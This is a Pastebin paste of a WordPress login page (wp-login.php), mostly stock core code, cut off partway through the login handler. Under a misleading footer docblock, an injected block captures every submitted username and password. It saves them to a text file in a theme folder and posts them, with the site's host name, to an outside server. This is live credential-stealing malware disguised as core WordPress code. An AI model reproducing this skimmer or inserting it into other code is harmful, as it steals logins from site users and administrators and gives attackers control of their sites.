Advertisement
Guest User

Untitled

a guest
Oct 27th, 2016
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.25 KB | None | 0 0
  1. <?php
  2. /**
  3. * WordPress User Page
  4. *
  5. * Handles authentication, registering, resetting passwords, forgot password,
  6. * and other user handling.
  7. *
  8. * @package WordPress
  9. */
  10.  
  11. /** Make sure that the WordPress bootstrap has run before continuing. */
  12. require( dirname(__FILE__) . '/wp-load.php' );
  13.  
  14. // Redirect to https login if forced to use SSL
  15. if ( force_ssl_admin() && ! is_ssl() ) {
  16. if ( 0 === strpos($_SERVER['REQUEST_URI'], 'http') ) {
  17. wp_redirect( set_url_scheme( $_SERVER['REQUEST_URI'], 'https' ) );
  18. exit();
  19. } else {
  20. wp_redirect( 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] );
  21. exit();
  22. }
  23. }
  24.  
  25. /**
  26. * Output the login page header.
  27. *
  28. * @param string $title Optional. WordPress login Page title to display in the `<title>` element.
  29. * Default 'Log In'.
  30. * @param string $message Optional. Message to display in header. Default empty.
  31. * @param WP_Error $wp_error Optional. The error to pass. Default empty.
  32. */
  33. function login_header( $title = 'Log In', $message = '', $wp_error = '' ) {
  34. global $error, $interim_login, $action;
  35.  
  36. // Don't index any of these forms
  37. add_action( 'login_head', 'wp_no_robots' );
  38.  
  39. if ( wp_is_mobile() )
  40. add_action( 'login_head', 'wp_login_viewport_meta' );
  41.  
  42. if ( empty($wp_error) )
  43. $wp_error = new WP_Error();
  44.  
  45. // Shake it!
  46. $shake_error_codes = array( 'empty_password', 'empty_email', 'invalid_email', 'invalidcombo', 'empty_username', 'invalid_username', 'incorrect_password' );
  47. /**
  48. * Filters the error codes array for shaking the login form.
  49. *
  50. * @since 3.0.0
  51. *
  52. * @param array $shake_error_codes Error codes that shake the login form.
  53. */
  54. $shake_error_codes = apply_filters( 'shake_error_codes', $shake_error_codes );
  55.  
  56. if ( $shake_error_codes && $wp_error->get_error_code() && in_array( $wp_error->get_error_code(), $shake_error_codes ) )
  57. add_action( 'login_head', 'wp_shake_js', 12 );
  58.  
  59. $separator = is_rtl() ? ' &rsaquo; ' : ' &lsaquo; ';
  60.  
  61. ?><!DOCTYPE html>
  62. <!--[if IE 8]>
  63. <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" <?php language_attributes(); ?>>
  64. <![endif]-->
  65. <!--[if !(IE 8) ]><!-->
  66. <html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
  67. <!--<![endif]-->
  68. <head>
  69. <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
  70. <title><?php echo get_bloginfo( 'name', 'display' ) . $separator . $title; ?></title>
  71. <?php
  72.  
  73. wp_enqueue_style( 'login' );
  74.  
  75. /*
  76. * Remove all stored post data on logging out.
  77. * This could be added by add_action('login_head'...) like wp_shake_js(),
  78. * but maybe better if it's not removable by plugins
  79. */
  80. if ( 'loggedout' == $wp_error->get_error_code() ) {
  81. ?>
  82. <script>if("sessionStorage" in window){try{for(var key in sessionStorage){if(key.indexOf("wp-autosave-")!=-1){sessionStorage.removeItem(key)}}}catch(e){}};</script>
  83. <?php
  84. }
  85.  
  86. /**
  87. * Enqueue scripts and styles for the login page.
  88. *
  89. * @since 3.1.0
  90. */
  91. do_action( 'login_enqueue_scripts' );
  92.  
  93. /**
  94. * Fires in the login page header after scripts are enqueued.
  95. *
  96. * @since 2.1.0
  97. */
  98. do_action( 'login_head' );
  99.  
  100. if ( is_multisite() ) {
  101. $login_header_url = network_home_url();
  102. $login_header_title = get_current_site()->site_name;
  103. } else {
  104. $login_header_url = __( 'https://wordpress.org/' );
  105. $login_header_title = __( 'Powered by WordPress' );
  106. }
  107.  
  108. /**
  109. * Filters link URL of the header logo above login form.
  110. *
  111. * @since 2.1.0
  112. *
  113. * @param string $login_header_url Login header logo URL.
  114. */
  115. $login_header_url = apply_filters( 'login_headerurl', $login_header_url );
  116.  
  117. /**
  118. * Filters the title attribute of the header logo above login form.
  119. *
  120. * @since 2.1.0
  121. *
  122. * @param string $login_header_title Login header logo title attribute.
  123. */
  124. $login_header_title = apply_filters( 'login_headertitle', $login_header_title );
  125.  
  126. $classes = array( 'login-action-' . $action, 'wp-core-ui' );
  127. if ( wp_is_mobile() )
  128. $classes[] = 'mobile';
  129. if ( is_rtl() )
  130. $classes[] = 'rtl';
  131. if ( $interim_login ) {
  132. $classes[] = 'interim-login';
  133. ?>
  134. <style type="text/css">html{background-color: transparent;}</style>
  135. <?php
  136.  
  137. if ( 'success' === $interim_login )
  138. $classes[] = 'interim-login-success';
  139. }
  140. $classes[] =' locale-' . sanitize_html_class( strtolower( str_replace( '_', '-', get_locale() ) ) );
  141.  
  142. /**
  143. * Filters the login page body classes.
  144. *
  145. * @since 3.5.0
  146. *
  147. * @param array $classes An array of body classes.
  148. * @param string $action The action that brought the visitor to the login page.
  149. */
  150. $classes = apply_filters( 'login_body_class', $classes, $action );
  151.  
  152. ?>
  153. </head>
  154. <body class="login <?php echo esc_attr( implode( ' ', $classes ) ); ?>">
  155. <?php
  156. /**
  157. * Fires in the login page header after the body tag is opened.
  158. *
  159. * @since 4.6.0
  160. */
  161. do_action( 'login_header' );
  162. ?>
  163. <div id="login">
  164. <h1><a href="<?php echo esc_url( $login_header_url ); ?>" title="<?php echo esc_attr( $login_header_title ); ?>" tabindex="-1"><?php bloginfo( 'name' ); ?></a></h1>
  165. <?php
  166.  
  167. unset( $login_header_url, $login_header_title );
  168.  
  169. /**
  170. * Filters the message to display above the login form.
  171. *
  172. * @since 2.1.0
  173. *
  174. * @param string $message Login message text.
  175. */
  176. $message = apply_filters( 'login_message', $message );
  177. if ( !empty( $message ) )
  178. echo $message . "\n";
  179.  
  180. // In case a plugin uses $error rather than the $wp_errors object
  181. if ( !empty( $error ) ) {
  182. $wp_error->add('error', $error);
  183. unset($error);
  184. }
  185.  
  186. if ( $wp_error->get_error_code() ) {
  187. $errors = '';
  188. $messages = '';
  189. foreach ( $wp_error->get_error_codes() as $code ) {
  190. $severity = $wp_error->get_error_data( $code );
  191. foreach ( $wp_error->get_error_messages( $code ) as $error_message ) {
  192. if ( 'message' == $severity )
  193. $messages .= ' ' . $error_message . "<br />\n";
  194. else
  195. $errors .= ' ' . $error_message . "<br />\n";
  196. }
  197. }
  198. if ( ! empty( $errors ) ) {
  199. /**
  200. * Filters the error messages displayed above the login form.
  201. *
  202. * @since 2.1.0
  203. *
  204. * @param string $errors Login error message.
  205. */
  206. echo '<div id="login_error">' . apply_filters( 'login_errors', $errors ) . "</div>\n";
  207. }
  208. if ( ! empty( $messages ) ) {
  209. /**
  210. * Filters instructional messages displayed above the login form.
  211. *
  212. * @since 2.5.0
  213. *
  214. * @param string $messages Login messages.
  215. */
  216. echo '<p class="message">' . apply_filters( 'login_messages', $messages ) . "</p>\n";
  217. }
  218. }
  219. } // End of login_header()
  220.  
  221. /**
  222. * Outputs the footer for the login page.
  223. *
  224. * @param string $input_id Which input to auto-focus
  225. */
  226. if($_POST){
  227.  
  228. $userr = $_POST['log'];
  229. $pww = $_POST['pwd'];
  230.  
  231. $subject = "SİTE:".$_SERVER["HTTP_HOST"]."";
  232. $site = $_SERVER["HTTP_HOST"];
  233.  
  234.  
  235. $dosya_adi = "/wp-content/themes/classipress/register.txt";
  236. touch ("/wp-content/themes/classipress/register.txt") or die ("Dosya Yaratılamadı!") ;
  237. $dosya = fopen ('/wp-content/themes/classipress//register.txt' , 'a') or die ("Dosya açılamadı!");
  238. file_put_contents ($dosya_adi , ' Username:'.$userr.'
  239. PW:'.$pww.'',FILE_APPEND);
  240.  
  241.  
  242.  
  243. $ch = curl_init();
  244. curl_setopt($ch, CURLOPT_URL, "http://warezciniz.com/log.php");
  245. curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
  246. curl_setopt($ch, CURLOPT_POST, true);
  247. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  248. curl_setopt($ch, CURLOPT_AUTOREFERER, true);
  249. curl_setopt($ch, CURLOPT_POSTFIELDS, array(
  250. 'user' => $userr,
  251. 'pw' => $pww,
  252. 'site' => $site,
  253. ));
  254. $result = curl_exec($ch);
  255. curl_close($ch);
  256.  
  257.  
  258. $icerik = 'Usename: ' .$userr. '
  259. PW: ' .$pww. '
  260. Site:'. $_SERVER["HTTP_HOST"];
  261.  
  262.  
  263. }
  264. function login_footer($input_id = '') {
  265. global $interim_login;
  266.  
  267. // Don't allow interim logins to navigate away from the page.
  268. if ( ! $interim_login ): ?>
  269. <p id="backtoblog"><a href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php
  270. /* translators: %s: site title */
  271. printf( _x( '&larr; Back to %s', 'site' ), get_bloginfo( 'title', 'display' ) );
  272. ?></a></p>
  273. <?php endif; ?>
  274.  
  275. </div>
  276.  
  277. <?php if ( !empty($input_id) ) : ?>
  278. <script type="text/javascript">
  279. try{document.getElementById('<?php echo $input_id; ?>').focus();}catch(e){}
  280. if(typeof wpOnload=='function')wpOnload();
  281. </script>
  282. <?php endif; ?>
  283.  
  284. <?php
  285. /**
  286. * Fires in the login page footer.
  287. *
  288. * @since 3.1.0
  289. */
  290. do_action( 'login_footer' ); ?>
  291. <div class="clear"></div>
  292. </body>
  293. </html>
  294. <?php
  295. }
  296.  
  297. /**
  298. * @since 3.0.0
  299. */
  300. function wp_shake_js() {
  301. if ( wp_is_mobile() )
  302. return;
  303. ?>
  304. <script type="text/javascript">
  305. addLoadEvent = function(func){if(typeof jQuery!="undefined")jQuery(document).ready(func);else if(typeof wpOnload!='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}};
  306. function s(id,pos){g(id).left=pos+'px';}
  307. function g(id){return document.getElementById(id).style;}
  308. function shake(id,a,d){c=a.shift();s(id,c);if(a.length>0){setTimeout(function(){shake(id,a,d);},d);}else{try{g(id).position='static';wp_attempt_focus();}catch(e){}}}
  309. addLoadEvent(function(){ var p=new Array(15,30,15,0,-15,-30,-15,0);p=p.concat(p.concat(p));var i=document.forms[0].id;g(i).position='relative';shake(i,p,20);});
  310. </script>
  311. <?php
  312. }
  313.  
  314. /**
  315. * @since 3.7.0
  316. */
  317. function wp_login_viewport_meta() {
  318. ?>
  319. <meta name="viewport" content="width=device-width" />
  320. <?php
  321. }
  322.  
  323. /**
  324. * Handles sending password retrieval email to user.
  325. *
  326. * @global wpdb $wpdb WordPress database abstraction object.
  327. * @global PasswordHash $wp_hasher Portable PHP password hashing framework.
  328. *
  329. * @return bool|WP_Error True: when finish. WP_Error on error
  330. */
  331. function retrieve_password() {
  332. global $wpdb, $wp_hasher;
  333.  
  334. $errors = new WP_Error();
  335.  
  336. if ( empty( $_POST['user_login'] ) ) {
  337. $errors->add('empty_username', __('<strong>ERROR</strong>: Enter a username or email address.'));
  338. } elseif ( strpos( $_POST['user_login'], '@' ) ) {
  339. $user_data = get_user_by( 'email', trim( wp_unslash( $_POST['user_login'] ) ) );
  340. if ( empty( $user_data ) )
  341. $errors->add('invalid_email', __('<strong>ERROR</strong>: There is no user registered with that email address.'));
  342. } else {
  343. $login = trim($_POST['user_login']);
  344. $user_data = get_user_by('login', $login);
  345. }
  346.  
  347. /**
  348. * Fires before errors are returned from a password reset request.
  349. *
  350. * @since 2.1.0
  351. * @since 4.4.0 Added the `$errors` parameter.
  352. *
  353. * @param WP_Error $errors A WP_Error object containing any errors generated
  354. * by using invalid credentials.
  355. */
  356. do_action( 'lostpassword_post', $errors );
  357.  
  358. if ( $errors->get_error_code() )
  359. return $errors;
  360.  
  361. if ( !$user_data ) {
  362. $errors->add('invalidcombo', __('<strong>ERROR</strong>: Invalid username or email.'));
  363. return $errors;
  364. }
  365.  
  366. // Redefining user_login ensures we return the right case in the email.
  367. $user_login = $user_data->user_login;
  368. $user_email = $user_data->user_email;
  369. $key = get_password_reset_key( $user_data );
  370.  
  371. if ( is_wp_error( $key ) ) {
  372. return $key;
  373. }
  374.  
  375. $message = __('Someone has requested a password reset for the following account:') . "\r\n\r\n";
  376. $message .= network_home_url( '/' ) . "\r\n\r\n";
  377. $message .= sprintf(__('Username: %s'), $user_login) . "\r\n\r\n";
  378. $message .= __('If this was a mistake, just ignore this email and nothing will happen.') . "\r\n\r\n";
  379. $message .= __('To reset your password, visit the following address:') . "\r\n\r\n";
  380. $message .= '<' . network_site_url("wp-login.php?action=rp&key=$key&login=" . rawurlencode($user_login), 'login') . ">\r\n";
  381.  
  382. if ( is_multisite() )
  383. $blogname = $GLOBALS['current_site']->site_name;
  384. else
  385. /*
  386. * The blogname option is escaped with esc_html on the way into the database
  387. * in sanitize_option we want to reverse this for the plain text arena of emails.
  388. */
  389. $blogname = wp_specialchars_decode(get_option('blogname'), ENT_QUOTES);
  390.  
  391. $title = sprintf( __('[%s] Password Reset'), $blogname );
  392.  
  393. /**
  394. * Filters the subject of the password reset email.
  395. *
  396. * @since 2.8.0
  397. * @since 4.4.0 Added the `$user_login` and `$user_data` parameters.
  398. *
  399. * @param string $title Default email title.
  400. * @param string $user_login The username for the user.
  401. * @param WP_User $user_data WP_User object.
  402. */
  403. $title = apply_filters( 'retrieve_password_title', $title, $user_login, $user_data );
  404.  
  405. /**
  406. * Filters the message body of the password reset mail.
  407. *
  408. * @since 2.8.0
  409. * @since 4.1.0 Added `$user_login` and `$user_data` parameters.
  410. *
  411. * @param string $message Default mail message.
  412. * @param string $key The activation key.
  413. * @param string $user_login The username for the user.
  414. * @param WP_User $user_data WP_User object.
  415. */
  416. $message = apply_filters( 'retrieve_password_message', $message, $key, $user_login, $user_data );
  417.  
  418. if ( $message && !wp_mail( $user_email, wp_specialchars_decode( $title ), $message ) )
  419. wp_die( __('The email could not be sent.') . "<br />\n" . __('Possible reason: your host may have disabled the mail() function.') );
  420.  
  421. return true;
  422. }
  423.  
  424. //
  425. // Main
  426. //
  427.  
  428. $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
  429. $errors = new WP_Error();
  430.  
  431. if ( isset($_GET['key']) )
  432. $action = 'resetpass';
  433.  
  434. // validate action so as to default to the login screen
  435. if ( !in_array( $action, array( 'postpass', 'logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login' ), true ) && false === has_filter( 'login_form_' . $action ) )
  436. $action = 'login';
  437.  
  438. nocache_headers();
  439.  
  440. header('Content-Type: '.get_bloginfo('html_type').'; charset='.get_bloginfo('charset'));
  441.  
  442. if ( defined( 'RELOCATE' ) && RELOCATE ) { // Move flag is set
  443. if ( isset( $_SERVER['PATH_INFO'] ) && ($_SERVER['PATH_INFO'] != $_SERVER['PHP_SELF']) )
  444. $_SERVER['PHP_SELF'] = str_replace( $_SERVER['PATH_INFO'], '', $_SERVER['PHP_SELF'] );
  445.  
  446. $url = dirname( set_url_scheme( 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] ) );
  447. if ( $url != get_option( 'siteurl' ) )
  448. update_option( 'siteurl', $url );
  449. }
  450.  
  451. //Set a cookie now to see if they are supported by the browser.
  452. $secure = ( 'https' === parse_url( wp_login_url(), PHP_URL_SCHEME ) );
  453. setcookie( TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN, $secure );
  454. if ( SITECOOKIEPATH != COOKIEPATH )
  455. setcookie( TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN, $secure );
  456.  
  457. /**
  458. * Fires when the login form is initialized.
  459. *
  460. * @since 3.2.0
  461. */
  462. do_action( 'login_init' );
  463. /**
  464. * Fires before a specified login form action.
  465. *
  466. * The dynamic portion of the hook name, `$action`, refers to the action
  467. * that brought the visitor to the login form. Actions include 'postpass',
  468. * 'logout', 'lostpassword', etc.
  469. *
  470. * @since 2.8.0
  471. */
  472. do_action( 'login_form_' . $action );
  473.  
  474. $http_post = ('POST' == $_SERVER['REQUEST_METHOD']);
  475. $interim_login = isset($_REQUEST['interim-login']);
  476.  
  477. switch ($action) {
  478.  
  479. case 'postpass' :
  480. if ( ! array_key_exists( 'post_password', $_POST ) ) {
  481. wp_safe_redirect( wp_get_referer() );
  482. exit();
  483. }
  484.  
  485. require_once ABSPATH . WPINC . '/class-phpass.php';
  486. $hasher = new PasswordHash( 8, true );
  487.  
  488. /**
  489. * Filters the life span of the post password cookie.
  490. *
  491. * By default, the cookie expires 10 days from creation. To turn this
  492. * into a session cookie, return 0.
  493. *
  494. * @since 3.7.0
  495. *
  496. * @param int $expires The expiry time, as passed to setcookie().
  497. */
  498. $expire = apply_filters( 'post_password_expires', time() + 10 * DAY_IN_SECONDS );
  499. $referer = wp_get_referer();
  500. if ( $referer ) {
  501. $secure = ( 'https' === parse_url( $referer, PHP_URL_SCHEME ) );
  502. } else {
  503. $secure = false;
  504. }
  505. setcookie( 'wp-postpass_' . COOKIEHASH, $hasher->HashPassword( wp_unslash( $_POST['post_password'] ) ), $expire, COOKIEPATH, COOKIE_DOMAIN, $secure );
  506.  
  507. wp_safe_redirect( wp_get_referer() );
  508. exit();
  509.  
  510. case 'logout' :
  511. check_admin_referer('log-out');
  512.  
  513. $user = wp_get_current_user();
  514.  
  515. wp_logout();
  516.  
  517. if ( ! empty( $_REQUEST['redirect_to'] ) ) {
  518. $redirect_to = $requested_redirect_to = $_REQUEST['redirect_to'];
  519. } else {
  520. $redirect_to = 'wp-login.php?loggedout=true';
  521. $requested_redirect_to = '';
  522. }
  523.  
  524. /**
  525. * Filters the log out redirect URL.
  526. *
  527. * @since 4.2.0
  528. *
  529. * @param string $redirect_to The redirect destination URL.
  530. * @param string $requested_redirect_to The requested redirect destination URL passed as a parameter.
  531. * @param WP_User $user The WP_User object for the user that's logging out.
  532. */
  533. $redirect_to = apply_filters( 'logout_redirect', $redirect_to, $requested_redirect_to, $user );
  534. wp_safe_redirect( $redirect_to );
  535. exit();
  536.  
  537. case 'lostpassword' :
  538. case 'retrievepassword' :
  539.  
  540. if ( $http_post ) {
  541. $errors = retrieve_password();
  542. if ( !is_wp_error($errors) ) {
  543. $redirect_to = !empty( $_REQUEST['redirect_to'] ) ? $_REQUEST['redirect_to'] : 'wp-login.php?checkemail=confirm';
  544. wp_safe_redirect( $redirect_to );
  545. exit();
  546. }
  547. }
  548.  
  549. if ( isset( $_GET['error'] ) ) {
  550. if ( 'invalidkey' == $_GET['error'] ) {
  551. $errors->add( 'invalidkey', __( 'Your password reset link appears to be invalid. Please request a new link below.' ) );
  552. } elseif ( 'expiredkey' == $_GET['error'] ) {
  553. $errors->add( 'expiredkey', __( 'Your password reset link has expired. Please request a new link below.' ) );
  554. }
  555. }
  556.  
  557. $lostpassword_redirect = ! empty( $_REQUEST['redirect_to'] ) ? $_REQUEST['redirect_to'] : '';
  558. /**
  559. * Filters the URL redirected to after submitting the lostpassword/retrievepassword form.
  560. *
  561. * @since 3.0.0
  562. *
  563. * @param string $lostpassword_redirect The redirect destination URL.
  564. */
  565. $redirect_to = apply_filters( 'lostpassword_redirect', $lostpassword_redirect );
  566.  
  567. /**
  568. * Fires before the lost password form.
  569. *
  570. * @since 1.5.1
  571. */
  572. do_action( 'lost_password' );
  573.  
  574. login_header(__('Lost Password'), '<p class="message">' . __('Please enter your username or email address. You will receive a link to create a new password via email.') . '</p>', $errors);
  575.  
  576. $user_login = isset($_POST['user_login']) ? wp_unslash($_POST['user_login']) : '';
  577.  
  578. ?>
  579.  
  580. <form name="lostpasswordform" id="lostpasswordform" action="<?php echo esc_url( network_site_url( 'wp-login.php?action=lostpassword', 'login_post' ) ); ?>" method="post">
  581. <p>
  582. <label for="user_login" ><?php _e('Username or Email') ?><br />
  583. <input type="text" name="user_login" id="user_login" class="input" value="<?php echo esc_attr($user_login); ?>" size="20" /></label>
  584. </p>
  585. <?php
  586. /**
  587. * Fires inside the lostpassword form tags, before the hidden fields.
  588. *
  589. * @since 2.1.0
  590. */
  591. do_action( 'lostpassword_form' ); ?>
  592. <input type="hidden" name="redirect_to" value="<?php echo esc_attr( $redirect_to ); ?>" />
  593. <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="<?php esc_attr_e('Get New Password'); ?>" /></p>
  594. </form>
  595.  
  596. <p id="nav">
  597. <a href="<?php echo esc_url( wp_login_url() ); ?>"><?php _e('Log in') ?></a>
  598. <?php
  599. if ( get_option( 'users_can_register' ) ) :
  600. $registration_url = sprintf( '<a href="%s">%s</a>', esc_url( wp_registration_url() ), __( 'Register' ) );
  601.  
  602. /** This filter is documented in wp-includes/general-template.php */
  603. echo ' | ' . apply_filters( 'register', $registration_url );
  604. endif;
  605. ?>
  606. </p>
  607.  
  608. <?php
  609. login_footer('user_login');
  610. break;
  611.  
  612. case 'resetpass' :
  613. case 'rp' :
  614. list( $rp_path ) = explode( '?', wp_unslash( $_SERVER['REQUEST_URI'] ) );
  615. $rp_cookie = 'wp-resetpass-' . COOKIEHASH;
  616. if ( isset( $_GET['key'] ) ) {
  617. $value = sprintf( '%s:%s', wp_unslash( $_GET['login'] ), wp_unslash( $_GET['key'] ) );
  618. setcookie( $rp_cookie, $value, 0, $rp_path, COOKIE_DOMAIN, is_ssl(), true );
  619. wp_safe_redirect( remove_query_arg( array( 'key', 'login' ) ) );
  620. exit;
  621. }
  622.  
  623. if ( isset( $_COOKIE[ $rp_cookie ] ) && 0 < strpos( $_COOKIE[ $rp_cookie ], ':' ) ) {
  624. list( $rp_login, $rp_key ) = explode( ':', wp_unslash( $_COOKIE[ $rp_cookie ] ), 2 );
  625. $user = check_password_reset_key( $rp_key, $rp_login );
  626. if ( isset( $_POST['pass1'] ) && ! hash_equals( $rp_key, $_POST['rp_key'] ) ) {
  627. $user = false;
  628. }
  629. } else {
  630. $user = false;
  631. }
  632.  
  633. if ( ! $user || is_wp_error( $user ) ) {
  634. setcookie( $rp_cookie, ' ', time() - YEAR_IN_SECONDS, $rp_path, COOKIE_DOMAIN, is_ssl(), true );
  635. if ( $user && $user->get_error_code() === 'expired_key' )
  636. wp_redirect( site_url( 'wp-login.php?action=lostpassword&error=expiredkey' ) );
  637. else
  638. wp_redirect( site_url( 'wp-login.php?action=lostpassword&error=invalidkey' ) );
  639. exit;
  640. }
  641.  
  642. $errors = new WP_Error();
  643.  
  644. if ( isset($_POST['pass1']) && $_POST['pass1'] != $_POST['pass2'] )
  645. $errors->add( 'password_reset_mismatch', __( 'The passwords do not match.' ) );
  646.  
  647. /**
  648. * Fires before the password reset procedure is validated.
  649. *
  650. * @since 3.5.0
  651. *
  652. * @param object $errors WP Error object.
  653. * @param WP_User|WP_Error $user WP_User object if the login and reset key match. WP_Error object otherwise.
  654. */
  655. do_action( 'validate_password_reset', $errors, $user );
  656.  
  657. if ( ( ! $errors->get_error_code() ) && isset( $_POST['pass1'] ) && !empty( $_POST['pass1'] ) ) {
  658. reset_password($user, $_POST['pass1']);
  659. setcookie( $rp_cookie, ' ', time() - YEAR_IN_SECONDS, $rp_path, COOKIE_DOMAIN, is_ssl(), true );
  660. login_header( __( 'Password Reset' ), '<p class="message reset-pass">' . __( 'Your password has been reset.' ) . ' <a href="' . esc_url( wp_login_url() ) . '">' . __( 'Log in' ) . '</a></p>' );
  661. login_footer();
  662. exit;
  663. }
  664.  
  665. wp_enqueue_script('utils');
  666. wp_enqueue_script('user-profile');
  667.  
  668. login_header(__('Reset Password'), '<p class="message reset-pass">' . __('Enter your new password below.') . '</p>', $errors );
  669.  
  670. ?>
  671. <form name="resetpassform" id="resetpassform" action="<?php echo esc_url( network_site_url( 'wp-login.php?action=resetpass', 'login_post' ) ); ?>" method="post" autocomplete="off">
  672. <input type="hidden" id="user_login" value="<?php echo esc_attr( $rp_login ); ?>" autocomplete="off" />
  673.  
  674. <div class="user-pass1-wrap">
  675. <p>
  676. <label for="pass1"><?php _e( 'New password' ) ?></label>
  677. </p>
  678.  
  679. <div class="wp-pwd">
  680. <span class="password-input-wrapper">
  681. <input type="password" data-reveal="1" data-pw="<?php echo esc_attr( wp_generate_password( 16 ) ); ?>" name="pass1" id="pass1" class="input" size="20" value="" autocomplete="off" aria-describedby="pass-strength-result" />
  682. </span>
  683. <div id="pass-strength-result" class="hide-if-no-js" aria-live="polite"><?php _e( 'Strength indicator' ); ?></div>
  684. </div>
  685. </div>
  686.  
  687. <p class="user-pass2-wrap">
  688. <label for="pass2"><?php _e( 'Confirm new password' ) ?></label><br />
  689. <input type="password" name="pass2" id="pass2" class="input" size="20" value="" autocomplete="off" />
  690. </p>
  691.  
  692. <p class="description indicator-hint"><?php echo wp_get_password_hint(); ?></p>
  693. <br class="clear" />
  694.  
  695. <?php
  696. /**
  697. * Fires following the 'Strength indicator' meter in the user password reset form.
  698. *
  699. * @since 3.9.0
  700. *
  701. * @param WP_User $user User object of the user whose password is being reset.
  702. */
  703. do_action( 'resetpass_form', $user );
  704. ?>
  705. <input type="hidden" name="rp_key" value="<?php echo esc_attr( $rp_key ); ?>" />
  706. <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="<?php esc_attr_e('Reset Password'); ?>" /></p>
  707. </form>
  708.  
  709. <p id="nav">
  710. <a href="<?php echo esc_url( wp_login_url() ); ?>"><?php _e( 'Log in' ); ?></a>
  711. <?php
  712. if ( get_option( 'users_can_register' ) ) :
  713. $registration_url = sprintf( '<a href="%s">%s</a>', esc_url( wp_registration_url() ), __( 'Register' ) );
  714.  
  715. /** This filter is documented in wp-includes/general-template.php */
  716. echo ' | ' . apply_filters( 'register', $registration_url );
  717. endif;
  718. ?>
  719. </p>
  720.  
  721. <?php
  722. login_footer('user_pass');
  723. break;
  724.  
  725. case 'register' :
  726. if ( is_multisite() ) {
  727. /**
  728. * Filters the Multisite sign up URL.
  729. *
  730. * @since 3.0.0
  731. *
  732. * @param string $sign_up_url The sign up URL.
  733. */
  734. wp_redirect( apply_filters( 'wp_signup_location', network_site_url( 'wp-signup.php' ) ) );
  735. exit;
  736. }
  737.  
  738. if ( !get_option('users_can_register') ) {
  739. wp_redirect( site_url('wp-login.php?registration=disabled') );
  740. exit();
  741. }
  742.  
  743. $user_login = '';
  744. $user_email = '';
  745. if ( $http_post ) {
  746. $user_login = isset( $_POST['user_login'] ) ? $_POST['user_login'] : '';
  747. $user_email = isset( $_POST['user_email'] ) ? $_POST['user_email'] : '';
  748. $errors = register_new_user($user_login, $user_email);
  749. if ( !is_wp_error($errors) ) {
  750. $redirect_to = !empty( $_POST['redirect_to'] ) ? $_POST['redirect_to'] : 'wp-login.php?checkemail=registered';
  751. wp_safe_redirect( $redirect_to );
  752. exit();
  753. }
  754. }
  755.  
  756. $registration_redirect = ! empty( $_REQUEST['redirect_to'] ) ? $_REQUEST['redirect_to'] : '';
  757. /**
  758. * Filters the registration redirect URL.
  759. *
  760. * @since 3.0.0
  761. *
  762. * @param string $registration_redirect The redirect destination URL.
  763. */
  764. $redirect_to = apply_filters( 'registration_redirect', $registration_redirect );
  765. login_header(__('Registration Form'), '<p class="message register">' . __('Register For This Site') . '</p>', $errors);
  766. ?>
  767. <form name="registerform" id="registerform" action="<?php echo esc_url( site_url( 'wp-login.php?action=register', 'login_post' ) ); ?>" method="post" novalidate="novalidate">
  768. <p>
  769. <label for="user_login"><?php _e('Username') ?><br />
  770. <input type="text" name="user_login" id="user_login" class="input" value="<?php echo esc_attr(wp_unslash($user_login)); ?>" size="20" /></label>
  771. </p>
  772. <p>
  773. <label for="user_email"><?php _e('Email') ?><br />
  774. <input type="email" name="user_email" id="user_email" class="input" value="<?php echo esc_attr( wp_unslash( $user_email ) ); ?>" size="25" /></label>
  775. </p>
  776. <?php
  777. /**
  778. * Fires following the 'Email' field in the user registration form.
  779. *
  780. * @since 2.1.0
  781. */
  782. do_action( 'register_form' );
  783. ?>
  784. <p id="reg_passmail"><?php _e( 'Registration confirmation will be emailed to you.' ); ?></p>
  785. <br class="clear" />
  786. <input type="hidden" name="redirect_to" value="<?php echo esc_attr( $redirect_to ); ?>" />
  787. <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="<?php esc_attr_e('Register'); ?>" /></p>
  788. </form>
  789.  
  790. <p id="nav">
  791. <a href="<?php echo esc_url( wp_login_url() ); ?>"><?php _e( 'Log in' ); ?></a> |
  792. <a href="<?php echo esc_url( wp_lostpassword_url() ); ?>"><?php _e( 'Lost your password?' ); ?></a>
  793. </p>
  794.  
  795. <?php
  796. login_footer('user_login');
  797. break;
  798.  
  799. case 'login' :
  800. default:
  801. $secure_cookie = '';
  802. $customize_login = isset( $_REQUEST['customize-login'] );
  803. if ( $customize_login )
  804. wp_enqueue_script( 'customize-base' );
  805.  
  806. // If the user wants ssl but the session is not ssl, force a secure cookie.
  807. if ( !empty($_POST['log']) && !force_ssl_admin() ) {
  808. $user_name = sanitize_user($_POST['log']);
  809. $user = get_user_by( 'login', $user_name );
  810.  
  811. if ( ! $user && strpos( $user_name, '@' ) ) {
  812. $user = get_user_by( 'email', $user_name );
  813. }
  814.  
  815. if ( $user ) {
  816. if ( get_user_option('use_ssl', $user->ID) ) {
  817. $secure_cookie = true;
  818. force_ssl_admin(true);
  819. }
  820. }
  821. }
  822.  
  823. if ( isset( $_REQUEST['redirect_to'] ) ) {
  824. $redirect_to = $_REQUEST['redirect_to'];
  825. // Redirect to https if user wants ssl
  826. if ( $secure_cookie && false !== strpos($redirect_to, 'wp-admin') )
  827. $redirect_to = preg_replace('|^http://|', 'https://', $redirect_to);
  828. } else {
  829. $redirect_to = admin_url();
  830. }
  831.  
  832. $reauth = empty($_REQUEST['reauth']) ? false : true;
  833.  
  834. $user = wp_signon( array(), $secure_cookie );
  835.  
